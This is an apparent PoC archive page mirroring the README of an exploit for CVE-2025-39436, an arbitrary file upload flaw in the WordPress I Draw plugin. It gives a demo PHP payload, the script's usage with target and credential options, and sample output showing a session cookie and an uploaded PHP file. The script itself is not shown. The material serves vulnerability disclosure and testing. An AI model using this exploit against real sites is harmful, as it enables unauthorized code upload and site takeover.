Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-39436 PoC — WordPress I Draw <= 1.0 - Arbitrary File Upload Vulnerability

Source
Associated Vulnerability
Title:WordPress I Draw <= 1.0 - Arbitrary File Upload Vulnerability (CVE-2025-39436)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in aidraw I Draw idraw allows Using Malicious Files.This issue affects I Draw: from n/a through <= 1.0.
Description
 WordPress I Draw Plugin <= 1.0 is vulnerable to Arbitrary File Upload 
Readme
# 🚨 WordPress Plugin Exploit: CVE-2025-39436

## 📝 Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. This exploit allows attackers to upload malicious files without restriction. The issue impacts **I Draw versions up to 1.0**.

---

## 🛠️ Exploit Details
The exploit leverages the plugin's file upload functionality to execute a PHP payload. Below is the default payload used:

```php
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```

---

## 🚀 Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD
```

---

## 💻 Script Output Example
```plaintext
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php
```

---

## ⚠️ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.

---

*By: Nxploited ( Khaled Alenazi )*
File Snapshot

[4.0K] /data/pocs/7f16eda47cd884489fbf69196bce6110989e961e ├── [1.9K] CVE-2025-39436.py ├── [1.1K] LICENSE ├── [1.4K] README.md └── [ 9] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →